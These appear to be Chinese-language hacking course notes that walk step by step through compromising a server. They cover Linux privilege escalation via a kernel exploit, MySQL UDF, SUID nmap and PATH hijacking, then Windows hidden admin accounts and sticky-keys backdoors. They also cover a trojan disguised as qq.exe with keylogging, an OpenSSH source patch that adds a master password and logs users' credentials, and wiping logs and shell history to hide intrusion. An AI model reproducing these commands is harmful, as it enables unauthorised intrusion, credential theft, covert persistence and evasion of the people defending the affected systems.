Linux提权:
内核溢出提权
mysql udf提权
利用SUID提权
利用环境变量劫持高权限程序提权
内核溢出提权
查看内核 uname -r
反弹shell执行命令
上传exp
编译
执行
根据内核版本查找对应漏洞
收集exp
可以从www.exploit-db.com查找漏洞利用
rhel linux
先上传一个大马
#ifconfig
#iptables -F
#setenforce 0
大马->执行命令
uname -r 查看内核版本号
权限提升->linuxEXP->mempodipper2.6.39.c
大马->文件管理->上传
需要移动到tmp目录下,才能有权限 mempodipper2.6.39.c->改名a.c
大马->(#)cp /var/www/html/a.c /tmp/a.c
ls /tmp
大马->Linux提权->反弹端口
本机nc -l -n -v -p 12345侦听
本机->ls /tmp
whoami 是apache权限,比较小
cd /tmp
gcc a.c (默认生成一个a.out)
ls -l 查看是否有权限
chmod 777 a.out 对其附加权限
./a.out 执行进行提权
whoami 回车 如果卡住的话,说明利用失败
mysql UDF提权
上传库文件
执行库文件创建命令执行函数
cracer官网去查看
要有一个udf.txt
大马->MYSQL提权->user/pw->复制32位的udf.txt代码->①(执行)(没有权限)
# chmod 777 -R /usr/lib/mysql/plugin 设置权限
再执行①,就有权限执行了
select sys_eval('cat /etc/passwd');
漏洞利用->mysql提权工具->指定ip,外连测试
数据管理->开启root外链->第一条代码复制
大马->MYSQL->复制,执行成功后,就能外连了
mysql提权工具->udf提权
利用SUID提权
寻找系统里可以用的SUID文件来提权
$find / -perm -u=s -type f 2>/dev/null
大马->执行命令->复制,$去掉
SUID是设置用户id,查看哪些文件是有SUID的,某些文件普通用户可以临时具有管理员权限.
我们发现nmap居然有SUID标志位,来看看nmap版本
nmap支持"interactive"选项,用户能够通过该选项执行shell命令,通常,安全人员会使用该命令来避免他们使用nmap命令被记录在history文件中
#nmap --interactive
因为nmap有SUID位,所以通过"!sh"我们会获取到一个root权限的shell
#nmap> !sh
SUID普通用户也会有权限对其控制,相当于拥有root权限
->开一个执行命令的窗口
利用环境变量劫持高权限程序提权
第一步:查找可操作文件
$find/ -perm -u=s -type f 2>/dev/null
第二步:利用file命令查看文件是否可执行
执行该文件
在执行的时候可能会报错,根据报错来查看调用系统命令
利用低权限用户目录下可被root权限用户调用的脚本提权
设置bash的$path环境变量
然而当我们调用cat命令的时候,cat会从以上目录来寻找,如果我们添加.到$PATH环境变量,则会先从当前目录来寻找cat指令.
新建cat,添加执行权限
这样当我们再次运行./msgmike命令的时候,就会触发当前目录下的cat(/bin/sh),从而提权.
$ ls
ls
msgmike
$ file msgmike
$ ./msgmike
./msgmike
cat: .....No such file or directory
$ touch cat
touch cat
$ echo "/bin/sh" > cat
echo "/bin/sh" > cat
$ export PATH="."
$ msgmike
reg:
大马->执行命令->export PATH="."
大马->执行命令->echo "/bin/bash"> ping 创建一个bean
后渗透攻击
维持访问
记录清除
综合利用
维持访问:
创建后门账号
安装后门程序
安装远控程序
安装Linux后门
Windows怎么创建后门?
答:
net user cc 123.com /add
net localgroup administrator cc /add
net user cc
net user guest /active:yes
net user guest 123.com
net localgroup administrator guest /add
建议用SUPPORT_338945a0
先登录进去,再创建隐藏账号,然后在删掉之前的就可以了
右键->我的电脑->管理->用户->右击3389->设置密码
属性->拨入->允许访问
regedit->SAM->右击属性->添加Everyone
SAM->Domains->Account->Users->Names->找到对应的号,然后打开管理员那个而不是自己创建的那个->打开F->复制16进制数,找到自己创建的号的F,然后粘贴
然后虽然显示的是未连接,但是却可以远程连接这个账户了.
超级隐藏后门->权限提升->超级隐藏后门
安装后门用权限提升->sethc
按5次shift就可以***比较危险,容易全盘感染,杀毒软件都不管用
根据热键表 设置热键 reg:65,68
起名叫lpk
lpk文件一般都是会调用的,首先调用同一级别目录的lpk
5次shift,再按热键,输入密码->可以调用cmd命令whoami
安装远程控制:
权限提升->sx(上兴,类似灰鸽子,大灰狼)->打开->地址要外网地址,是返回来连接攻击端的端口->生成,可以改名为qq.exe
内网的话,就端口转发
有个键盘记录. 可以监听
安装Linux后门:
Linux,权限提升->linux后门工具上传上去
tar zxvf openssh-5.9p1.tar.gz
tar zxvf 0x06-openssh-5.9p1.patch.tar.gz
cd openssh-5.9p1.patch/
cp sshbd5.9.p1.diff ../openssh-5.9p1
cd ../openssh-5.9p1
patch <sshbd5.9p1.diff //patch 后门
vi includes.h //修改后门密码,记录文件位置
/*
+#define ILOG "/tmp/ilog" //记录登良路到本机的用户名和密码
+#define OLOG "/tmp/olog" //记录本机登录到远程的用户名和密码
+#define SECRETPW "123456" //你后门的密码
*/
# ssh -v
vi version.h //修改ssh版本信息,改成原来的,防止用户登录的时候察觉到
先安装所需环境不然会报错
yum install -y openssl openssl-devel pan devel
./configure --prefix=/usr --sysconfdir=/etc/ssh --with-pam --with-kerberos5 //通过源代码的安装,配置安装编译前的环境配置,源代码安装经常会报错
注意要是出现:configure:error:***zlib.h missing - please install first or check config.log
需要安装zlib
yum install -y zlib zlib -devel
http://sourceforge.net/projects/libpng/files/zlib/1.2.3/zlib-1.2.3.tar.gz/download需要make clean
make && make install //写一个就行
service sshd restart //重启sshd
然后我们登录ssh看看
cd -
vi includes.h
:wq
cat /tmp/ilog //记录别人登录我
ssh 192.168.3.112
yes
123456
exit
cat /tmp/olog //记录我登录的别人
记录清除
windows系统记录清除
Linux系统记录清除
扫描网站目录,会记录在哪里?
答:记录在网站日志文件中
虚拟主机:htdoc,log
log记录网站访问日志,需要擦除相关日志
正常网站的话,reg:iis 百度:网站访问日志.
进行分析->如果不严重的话,在这个日志找不到你就会算了.但是如果很严重的话,怎么删都不行.
服务端电脑->管理->事件查看器->安全性->清记录
一般是: 日志+文件修改时间+权限 来进行判断的
数据恢复的也可以看到
Linux怎么查呢?
答:
ls /var/log/httpd/
cat /var/log/httpd/access_log
ls -l /var/www/html/ //查看网站的上传日期
touch * //将文件更新到最新
history //查看执行指令命令
history -c //清除指令命令